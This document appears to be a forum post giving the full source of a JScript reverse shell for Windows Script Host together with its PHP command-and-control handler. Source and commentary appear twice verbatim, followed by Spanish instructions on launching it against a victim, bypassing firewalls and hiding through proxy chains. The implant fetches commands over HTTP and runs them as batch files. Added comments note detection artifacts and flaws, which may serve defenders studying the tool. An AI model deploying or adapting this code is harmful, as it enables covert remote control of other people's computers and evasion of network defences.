/*********************************************************
* JSCRIPT - REVERSE SHELL
* THIS SMALL PROGRAM POLLS A HANDLER ON AN HTTP SERVER. THE COMMANDS TO
* EXECUTE ON THE VICTIM'S MACHINE ARE RECEIVED OVER PLAIN HTTP (XMLHTTP),
* SO A PORT-BASED EGRESS FIREWALL THAT ALLOWS OUTBOUND PORT 80 WILL NOT
* BLOCK IT. NOTE THAT A PROXY OR IDS INSPECTING THE TRAFFIC STILL SEES
* THE FIXED-CADENCE POSTS AND THE NON-STANDARD "Comando" RESPONSE HEADER,
* AND THAT THE CHANNEL IS UNENCRYPTED AND UNAUTHENTICATED.
* THE VARIABLES USED ARE:
* - SND-POST (p) = last command output
* - RECV-HEADER (Comando) = command to execute
* (c) "Sirdarckcat-(Elhacker.Net)" (2005)
* This program is distributed under the GPL of GNU, with just
* this signature as invariant text, a copy of this licence can be
* found at http://www.gnu.org/.
* Any comments at:
* sirdarckcat [at] gma¡l [dot] com
*
*
* Use: just double click it
*
* This program is distributed "as is", with no warranty, and I am
* not responsible for any damage caused by primary or secondary
* effects of this program.
*
*-------------------------- HANDLER EXAMPLE -----------------------------*
<?php
// (c) Sirdarckcat-(elhacker.net) (2005)
//
// die("STOP!!"); // uncomment to halt the handler in case of error
// attack($q): operator side of the handler, reached via shell.php?a=...
// $q is the command submitted from the form (0/falsy when none was sent).
// commlog.txt doubles as command queue and output log: a queued command is
// stored as the FIRST line, "\t<urlencoded command>\n", which is exactly what
// victim() parses back with fscanf().
// NOTE(review): nothing in this file authenticates the operator -- the role is
// granted to any request that carries the `a` query parameter -- so anyone who
// can reach shell.php can queue commands for the implant and read the log.
function attack($q){
$default=urlencode("EXIT"); // queued whenever the operator page loads without a command
if($q){
// Prepend the new command so it becomes the line victim() serves next.
$fz=filesize("commlog.txt");
$logg = fopen("commlog.txt","r");
$todo = fread($logg,$fz); // NOTE(review): length 0 (empty log) is rejected by fread()
$todo = "\t".urlencode($q)."\n".$todo;
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
// Show the log and schedule a reload through the first link ("Fresca").
// The log is dumped raw between "<!--" and a "</xmp>" that has no opening
// "<xmp>", and nothing is HTML-escaped: output sent by the implant (or by
// anyone who POSTs to shell.php) is rendered as markup in the operator's
// browser -- a stored XSS against the operator.
echo "<a href=\"javascript:top.location.href=top.location.href;\">Fresca</a><!--";
readfile("commlog.txt");
echo "</xmp>
<script>
setTimeout('document.links[0].click();',1337);
</script>";
}elseif(isset($_GET['f'])){
// ?f=1 is the iframe view: same raw dump and auto-reload, nothing queued.
echo "<a href=\"javascript:top.location.href=top.location.href;\">Fresca</a><!--";
readfile("commlog.txt");
echo "</xmp>
<script>
setTimeout('document.links[0].click();',1337);
</script>";
}else{
// Plain operator page: queue the default command ("EXIT") and render the
// form below. The iframe polls ?a=1&f=1 for the log; the form POSTs `c` to ?a=1.
$logg = fopen("commlog.txt","r");
$todo = fread($logg,filesize("commlog.txt"));
$todo = "\t".urlencode($default)."\n".$todo."\n";
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
?>
<html>
<center><iframe src="shell.php?a=1&f=1" name="pkdo" width="100%" height="85%"></iframe><hr>
<form method="POST" target="pkdo" action="shell.php?a=1">
<b>Comandos:</b> <textarea name="c"></textarea><br>
<input type="Submit" value="Entrar">
</form>
</center>
</html>
<?php
}
}
// victim(): implant side of the handler (every request without the `a` parameter).
// Reads the previous command's output from POST field `p`, appends it to
// commlog.txt, and returns the next queued command in the non-standard
// "Comando" response header -- the header the JScript client reads.
// NOTE(review): this endpoint is unauthenticated too: any client can POST here
// and plant text in the log that attack() later renders without escaping.
function victim(){
$default=urlencode("echo .ERASEME."); // idle command: the implant just emits its end marker
$response=urldecode((isset($_POST['p']))?$_POST['p']:"Start!!"); // previous output, "Start!!" if absent
$logg = fopen("commlog.txt","r");
// The queue entry is the first line, "\t<token>\n". %s stops at whitespace,
// which is why commands are stored urlencoded (spaces as "+"); it also means
// the token cannot carry CR/LF into the header() call below.
$com = fscanf($logg, "\t%s\n");
$com = ($com[0])?$com[0]:$default; // nothing queued -> idle command
header("Comando: $com"); // command travels out of band, in a response header
fclose($logg);
$logg = fopen("commlog.txt","a");
if(strlen(trim($response))){
fwrite($logg,"\n<<".$response); // output entries are prefixed "<<"; written raw
}
fclose($logg);
if($com!=$default){
// A real command was handed out: push the idle command to the front so the
// same command is served only once.
$fz=filesize("commlog.txt");
$logg = fopen("commlog.txt","r");
$todo = fread($logg,$fz);
$todo = "\t".$default."\n".$todo."\n";
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
}
// Debug leftovers: the whole POST and the command are echoed in the body as
// well, so they are visible to anything inspecting the traffic.
print_r($_POST);
die("$com");
}
// Role dispatch: the presence of the `a` query parameter alone selects the
// operator role; every other request is treated as an implant beacon.
// NOTE(review): no credential, token or source check anywhere.
if (isset($_GET['a'])){
if(isset($_POST['c'])){
attack($_POST['c']); // command submitted from the form
}else{
attack(0); // page load or iframe refresh
}
}else{
// Both branches call victim(); the POST check is redundant.
if(isset($_POST['p'])){
victim();
}else{
victim();
}
}
?>
*********************************************************/
// Implant configuration. All three objects are Windows Script Host / MSXML COM
// objects, so this only runs where ActiveXObject is available (wscript.exe,
// cscript.exe, or an engine exposing it).
var xh = new ActiveXObject("msxml2.XMLHTTP"); // HTTP client for the beacon POST
var ws = new ActiveXObject("WScript.Shell"); // launches the dropped batch file
var fs = new ActiveXObject("Scripting.FileSystemObject"); // reads/writes the dropped files
// Working folder for the dropped files (log.log, r.bat, batch.bat). The implant
// creates this folder itself ("md" on the first run); it is a new top-level
// C:\SYSTEM32, not %SystemRoot%\System32 -- a clear on-disk indicator.
var path = "C:\\SYSTEM32\\";
var server = "127.0.0.1"; // handler host as shipped
var port = "80"; // handler TCP port (string: it is concatenated into the URL)
var pag = "shell.php"; // handler path, appended to http://server:port/
// reverse_shell(sh): one beacon cycle of the implant, then recurses.
//
// Flow per call:
//   1. If log.log exists (not the first run) its contents -- the previous
//      command's output minus the ".ERASEME." marker -- become the beacon body.
//      On the first run the body is "Inicio", `sh` is preset to a command that
//      creates the working folder, and r.bat (the fixed launcher) is written.
//   2. POST p=<beacon body> to http://server:port/pag (synchronous request).
//   3. Unless `sh` was preset, take the next command verbatim from the handler's
//      non-standard "Comando" response header.
//   4. Write that command to batch.bat and run r.bat, which executes batch.bat
//      with its output redirected into log.log.
//   5. Sleep and recurse.
//
// sh: command to run this cycle. Callers leave it undefined so it is taken
//     from the handler; only the first-run branch sets it internally.
//
// Security / detection notes (all visible in the code below):
//   - The command comes from a plaintext http:// response header and is written
//     to disk and executed with no validation, so the handler -- or anyone able
//     to answer the request on-path -- gets arbitrary command execution.
//   - Host artifacts: C:\SYSTEM32\log.log, r.bat and batch.bat, and a .bat run
//     from a script-host process via WScript.Shell.Run.
//   - Network artifacts: POSTs with body "p=..." and responses carrying a
//     "Comando" header, on a fixed cadence once the Sleep call works (see below).
//   - sn, sx and sw are assigned without `var`, so they are implicit globals.
function reverse_shell(sh){
if(fs.FileExists(path+"log.log")){ // log.log present => not the first run
// Read the previous command's output back from the log file.
sn = fs.OpenTextFile(path+"log.log", 1); // 1 = ForReading
sx = sn.ReadAll();
sn.Close();
sn=sx.split(".ERASEME.").join(""); // strip the end-of-output marker before sending
}else{
sh = "md "+path+"&echo Inicio>"+path+"log.log"; // first run: create the working folder and seed log.log
sn = "Inicio" // beacon body announcing the start
sw = fs.OpenTextFile(path+"r.bat", 2, 1); // 2 = ForWriting, create if missing
// r.bat, the fixed launcher: cd to the drive root, run batch.bat with its
// output redirected to log.log, then write the ".ERASEME." marker.
// NOTE(review): the final ">" truncates log.log, so the output written by the
// previous line is replaced by just the marker; whether this is one of the
// two errors the author says were left in on purpose is not stated.
sw.Write(unescape("@echo on%0d%0a@cd \\%0d%0a"+path+"batch.bat>"+path+"log.log%0d%0aecho .ERASEME.>"+path+"log.log"));
sw.Close();
}
// Synchronous (third argument 0) POST of the previous output to the handler.
xh.open("POST","http://"+server+":"+port+"/"+pag,0);
xh.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// JScript escape() is not urlencode(): non-ASCII becomes %uXXXX, which the
// handler's urldecode() does not understand -- ASCII-only output is assumed.
xh.send("p="+escape(sn));
if(!sh)
// Next command arrives in the "Comando" response header; "+" -> " " undoes the
// handler's urlencode() of spaces, which unescape() leaves untouched.
sh = unescape(xh.getResponseHeader("Comando")).split("+").join(" ");
//alert(sh+"::::::::"+xh.ResponseText); // debug aid (disabled)
sw = fs.OpenTextFile(path+"batch.bat", 2, 1); // overwrite batch.bat with the command
sw.Write(sh);
sw.Close();
ws.Run(path+"r.bat"); // run the launcher (a .bat, i.e. a cmd.exe child of the script host)
if(sh){ // in normal operation always true: the handler's idle command "echo .ERASEME." is non-empty
// NOTE(review): WScript.Shell exposes no Sleep method (Sleep belongs to the
// WScript object), so this call throws -- presumably one of the two errors the
// author says were left in deliberately.
ws.Sleep(5000);
// Each cycle nests another call frame instead of looping, so the stack grows
// with every beacon.
reverse_shell(); // Loop
}
}
reverse_shell(); // entry point: first beacon, no preset command
/*********************************************************
* JSCRIPT - REVERSE SHELL
* THIS SMALL PROGRAM POLLS A HANDLER ON AN HTTP SERVER. THE COMMANDS TO
* EXECUTE ON THE VICTIM'S MACHINE ARE RECEIVED OVER PLAIN HTTP (XMLHTTP),
* SO A PORT-BASED EGRESS FIREWALL THAT ALLOWS OUTBOUND PORT 80 WILL NOT
* BLOCK IT. NOTE THAT A PROXY OR IDS INSPECTING THE TRAFFIC STILL SEES
* THE FIXED-CADENCE POSTS AND THE NON-STANDARD "Comando" RESPONSE HEADER,
* AND THAT THE CHANNEL IS UNENCRYPTED AND UNAUTHENTICATED.
* THE VARIABLES USED ARE:
* - SND-POST (p) = last command output
* - RECV-HEADER (Comando) = command to execute
* (c) "Sirdarckcat-(Elhacker.Net)" (2005)
* This program is distributed under the GPL of GNU, with just
* this signature as invariant text, a copy of this licence can be
* found at http://www.gnu.org/.
* Any comments at:
* sirdarckcat [at] gma¡l [dot] com
*
*
* Use: just double click it
*
* This program is distributed "as is", with no warranty, and I am
* not responsible for any damage caused by primary or secondary
* effects of this program.
*
*-------------------------- HANDLER EXAMPLE -----------------------------*
<?php
// (c) Sirdarckcat-(elhacker.net) (2005)
//
// die("STOP!!"); // uncomment to halt the handler in case of error
// attack($q): operator side of the handler, reached via shell.php?a=...
// $q is the command submitted from the form (0/falsy when none was sent).
// commlog.txt doubles as command queue and output log: a queued command is
// stored as the FIRST line, "\t<urlencoded command>\n", which is exactly what
// victim() parses back with fscanf().
// NOTE(review): nothing in this file authenticates the operator -- the role is
// granted to any request that carries the `a` query parameter -- so anyone who
// can reach shell.php can queue commands for the implant and read the log.
function attack($q){
$default=urlencode("EXIT"); // queued whenever the operator page loads without a command
if($q){
// Prepend the new command so it becomes the line victim() serves next.
$fz=filesize("commlog.txt");
$logg = fopen("commlog.txt","r");
$todo = fread($logg,$fz); // NOTE(review): length 0 (empty log) is rejected by fread()
$todo = "\t".urlencode($q)."\n".$todo;
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
// Show the log and schedule a reload through the first link ("Fresca").
// The log is dumped raw between "<!--" and a "</xmp>" that has no opening
// "<xmp>", and nothing is HTML-escaped: output sent by the implant (or by
// anyone who POSTs to shell.php) is rendered as markup in the operator's
// browser -- a stored XSS against the operator.
echo "<a href=\"javascript:top.location.href=top.location.href;\">Fresca</a><!--";
readfile("commlog.txt");
echo "</xmp>
<script>
setTimeout('document.links[0].click();',1337);
</script>";
}elseif(isset($_GET['f'])){
// ?f=1 is the iframe view: same raw dump and auto-reload, nothing queued.
echo "<a href=\"javascript:top.location.href=top.location.href;\">Fresca</a><!--";
readfile("commlog.txt");
echo "</xmp>
<script>
setTimeout('document.links[0].click();',1337);
</script>";
}else{
// Plain operator page: queue the default command ("EXIT") and render the
// form below. The iframe polls ?a=1&f=1 for the log; the form POSTs `c` to ?a=1.
$logg = fopen("commlog.txt","r");
$todo = fread($logg,filesize("commlog.txt"));
$todo = "\t".urlencode($default)."\n".$todo."\n";
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
?>
<html>
<center><iframe src="shell.php?a=1&f=1" name="pkdo" width="100%" height="85%"></iframe><hr>
<form method="POST" target="pkdo" action="shell.php?a=1">
<b>Comandos:</b> <textarea name="c"></textarea><br>
<input type="Submit" value="Entrar">
</form>
</center>
</html>
<?php
}
}
// victim(): implant side of the handler (every request without the `a` parameter).
// Reads the previous command's output from POST field `p`, appends it to
// commlog.txt, and returns the next queued command in the non-standard
// "Comando" response header -- the header the JScript client reads.
// NOTE(review): this endpoint is unauthenticated too: any client can POST here
// and plant text in the log that attack() later renders without escaping.
function victim(){
$default=urlencode("echo .ERASEME."); // idle command: the implant just emits its end marker
$response=urldecode((isset($_POST['p']))?$_POST['p']:"Start!!"); // previous output, "Start!!" if absent
$logg = fopen("commlog.txt","r");
// The queue entry is the first line, "\t<token>\n". %s stops at whitespace,
// which is why commands are stored urlencoded (spaces as "+"); it also means
// the token cannot carry CR/LF into the header() call below.
$com = fscanf($logg, "\t%s\n");
$com = ($com[0])?$com[0]:$default; // nothing queued -> idle command
header("Comando: $com"); // command travels out of band, in a response header
fclose($logg);
$logg = fopen("commlog.txt","a");
if(strlen(trim($response))){
fwrite($logg,"\n<<".$response); // output entries are prefixed "<<"; written raw
}
fclose($logg);
if($com!=$default){
// A real command was handed out: push the idle command to the front so the
// same command is served only once.
$fz=filesize("commlog.txt");
$logg = fopen("commlog.txt","r");
$todo = fread($logg,$fz);
$todo = "\t".$default."\n".$todo."\n";
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
}
// Debug leftovers: the whole POST and the command are echoed in the body as
// well, so they are visible to anything inspecting the traffic.
print_r($_POST);
die("$com");
}
// Role dispatch: the presence of the `a` query parameter alone selects the
// operator role; every other request is treated as an implant beacon.
// NOTE(review): no credential, token or source check anywhere.
if (isset($_GET['a'])){
if(isset($_POST['c'])){
attack($_POST['c']); // command submitted from the form
}else{
attack(0); // page load or iframe refresh
}
}else{
// Both branches call victim(); the POST check is redundant.
if(isset($_POST['p'])){
victim();
}else{
victim();
}
}
?>
*********************************************************/
// Implant configuration. All three objects are Windows Script Host / MSXML COM
// objects, so this only runs where ActiveXObject is available (wscript.exe,
// cscript.exe, or an engine exposing it).
var xh = new ActiveXObject("msxml2.XMLHTTP"); // HTTP client for the beacon POST
var ws = new ActiveXObject("WScript.Shell"); // launches the dropped batch file
var fs = new ActiveXObject("Scripting.FileSystemObject"); // reads/writes the dropped files
// Working folder for the dropped files (log.log, r.bat, batch.bat). The implant
// creates this folder itself ("md" on the first run); it is a new top-level
// C:\SYSTEM32, not %SystemRoot%\System32 -- a clear on-disk indicator.
var path = "C:\\SYSTEM32\\";
var server = "127.0.0.1"; // handler host as shipped
var port = "80"; // handler TCP port (string: it is concatenated into the URL)
var pag = "shell.php"; // handler path, appended to http://server:port/
// reverse_shell(sh): one beacon cycle of the implant, then recurses.
//
// Flow per call:
//   1. If log.log exists (not the first run) its contents -- the previous
//      command's output minus the ".ERASEME." marker -- become the beacon body.
//      On the first run the body is "Inicio", `sh` is preset to a command that
//      creates the working folder, and r.bat (the fixed launcher) is written.
//   2. POST p=<beacon body> to http://server:port/pag (synchronous request).
//   3. Unless `sh` was preset, take the next command verbatim from the handler's
//      non-standard "Comando" response header.
//   4. Write that command to batch.bat and run r.bat, which executes batch.bat
//      with its output redirected into log.log.
//   5. Sleep and recurse.
//
// sh: command to run this cycle. Callers leave it undefined so it is taken
//     from the handler; only the first-run branch sets it internally.
//
// Security / detection notes (all visible in the code below):
//   - The command comes from a plaintext http:// response header and is written
//     to disk and executed with no validation, so the handler -- or anyone able
//     to answer the request on-path -- gets arbitrary command execution.
//   - Host artifacts: C:\SYSTEM32\log.log, r.bat and batch.bat, and a .bat run
//     from a script-host process via WScript.Shell.Run.
//   - Network artifacts: POSTs with body "p=..." and responses carrying a
//     "Comando" header, on a fixed cadence once the Sleep call works (see below).
//   - sn, sx and sw are assigned without `var`, so they are implicit globals.
function reverse_shell(sh){
if(fs.FileExists(path+"log.log")){ // log.log present => not the first run
// Read the previous command's output back from the log file.
sn = fs.OpenTextFile(path+"log.log", 1); // 1 = ForReading
sx = sn.ReadAll();
sn.Close();
sn=sx.split(".ERASEME.").join(""); // strip the end-of-output marker before sending
}else{
sh = "md "+path+"&echo Inicio>"+path+"log.log"; // first run: create the working folder and seed log.log
sn = "Inicio" // beacon body announcing the start
sw = fs.OpenTextFile(path+"r.bat", 2, 1); // 2 = ForWriting, create if missing
// r.bat, the fixed launcher: cd to the drive root, run batch.bat with its
// output redirected to log.log, then write the ".ERASEME." marker.
// NOTE(review): the final ">" truncates log.log, so the output written by the
// previous line is replaced by just the marker; whether this is one of the
// two errors the author says were left in on purpose is not stated.
sw.Write(unescape("@echo on%0d%0a@cd \\%0d%0a"+path+"batch.bat>"+path+"log.log%0d%0aecho .ERASEME.>"+path+"log.log"));
sw.Close();
}
// Synchronous (third argument 0) POST of the previous output to the handler.
xh.open("POST","http://"+server+":"+port+"/"+pag,0);
xh.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// JScript escape() is not urlencode(): non-ASCII becomes %uXXXX, which the
// handler's urldecode() does not understand -- ASCII-only output is assumed.
xh.send("p="+escape(sn));
if(!sh)
// Next command arrives in the "Comando" response header; "+" -> " " undoes the
// handler's urlencode() of spaces, which unescape() leaves untouched.
sh = unescape(xh.getResponseHeader("Comando")).split("+").join(" ");
//alert(sh+"::::::::"+xh.ResponseText); // debug aid (disabled)
sw = fs.OpenTextFile(path+"batch.bat", 2, 1); // overwrite batch.bat with the command
sw.Write(sh);
sw.Close();
ws.Run(path+"r.bat"); // run the launcher (a .bat, i.e. a cmd.exe child of the script host)
if(sh){ // in normal operation always true: the handler's idle command "echo .ERASEME." is non-empty
// NOTE(review): WScript.Shell exposes no Sleep method (Sleep belongs to the
// WScript object), so this call throws -- presumably one of the two errors the
// author says were left in deliberately.
ws.Sleep(5000);
// Each cycle nests another call frame instead of looping, so the stack grows
// with every beacon.
reverse_shell(); // Loop
}
}
reverse_shell(); // entry point: first beacon, no preset command
Una vez configurado para conectarse al servidor, solo hay que darle doble clic y, al entrar a:
http://servidor.com/shell.php?a=a
podremos enviar comandos a la víctima.
Estaba trabajando en una versión con AJAX, para no tener que andar "refrescando" la página, pero... ya me cansé, son las 2 de la mañana aquí en México.
Esta opción les sirve a los que necesiten una shell remota pero tengan un firewall muy molesto. En servidores ASP funciona a la perfección, ya que dan acceso a wscript.exe por defecto.
Saludos!!
/* Hay 2 errores fácilmente identificables: una instrucción no existe, y en otra me falta especificar una variable. Los que saben no tardarán en darse cuenta. */















Así te ahorras mucho; además es más anónimo, porque puedes entrar al handler a través de proxy-chaining y no te conectas directamente a la víctima.